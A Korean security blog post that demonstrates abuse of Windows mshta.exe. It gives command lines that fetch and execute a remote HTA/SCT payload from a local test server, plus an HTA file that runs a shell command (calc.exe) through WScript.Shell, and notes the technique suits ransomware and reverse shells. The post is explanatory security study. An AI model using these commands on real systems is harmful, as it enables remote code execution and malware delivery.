시스템 보안 - 윈도우 MSHTA(Microsoft HTML Application) 공격

728x90

command-line

mshta.exe vbscript:Close(Execute("GetObject(""script:http://127.0.0.1:4444/payload.sct"")"))

mshta.exe http://127.0.0.1:4444/payload.hta

mshta.exe \\127.0.0.1\folder\payload.hta

payload.hta (SCT payloads)

<html>
  <head>
    <HTA:APPLICATION ID="HelloExample">
    <script language="jscript">
      new ActiveXObject('WScript.Shell').Run("cmd.exe /c calc.exe");
    </script>
  </head>
  <body>
    <script>self.close();</script>
  </body>
</html>

결과

HTA(HTML Application)

보는 것처럼 윈도우에 기본적으로 설치된 mshta.exe(Microsoft HTML Application)는 마치 웹 브라우저처럼 외부에 있는 웹 페이지를 요청하는 기능을 가지고 있다.

여기서 문제점은 여기에 내장된 브라우저가 인터넷 익스플로러 기반인지 ActiveXObject가 실행이 가능해 쉘 명령어가 제대로 작동을 한다. (따로 ActiveXObject를 실행하겠냐는 경고문도 나오지 않았다.)

외부에 존재하는 웹 페이지를 요청하는 조합에다가 컴퓨터 내의 쉘을 실행하는 대환장파티가 벌어지는 것

랜섬웨어 설치는 물론 리버스쉘을 연결하는데는 이것이 충분히 악용될 수가 있다.

출처:

https://podalirius.net/en/articles/windows-reverse-shells-cheatsheet/

Windows Reverse Shells Cheatsheet

Windows Reverse Shells : 3 payloads in 1 different languages !

podalirius.net

https://www.ahnlab.com/kr/site/securityinfo/asec/asecView.do?groupCode=VNI001&seq=25631

AhnLab | ASEC Report

최고의 악성코드 분석가 및 보안 전문가 조직인 ASEC(AhnLab Security Emergency response Center)이 최신 보안 위협에 대한 상세한 분석 정보를 제공합니다.

www.ahnlab.com

728x90

'🔒정보보안 > 시스템 보안' 카테고리의 다른 글

시스템 보안 - EXE 파일 PE(Portable Executable) 구조 분석하기 (0)	2023.10.07
시스템 보안 - pwntools (0)	2023.03.25
시스템 보안 - 실행 파일이 없는 우회 기법(파일리스 공격) (0)	2023.02.07
시스템 보안 - 파이썬 리버스 쉘 스크립트 (0)	2023.01.25
시스템 보안 - 메타스플로잇 msfvenom 리버스 쉘 제작 명령어 (0)	2023.01.24

HackLog

시스템 보안 - 윈도우 MSHTA(Microsoft HTML Application) 공격

'🔒정보보안 > 시스템 보안' 카테고리의 다른 글

티스토리툴바

시스템 보안 - 윈도우 MSHTA(Microsoft HTML Application) 공격

'🔒정보보안 > 시스템 보안' 카테고리의 다른 글

관련글

티스토리툴바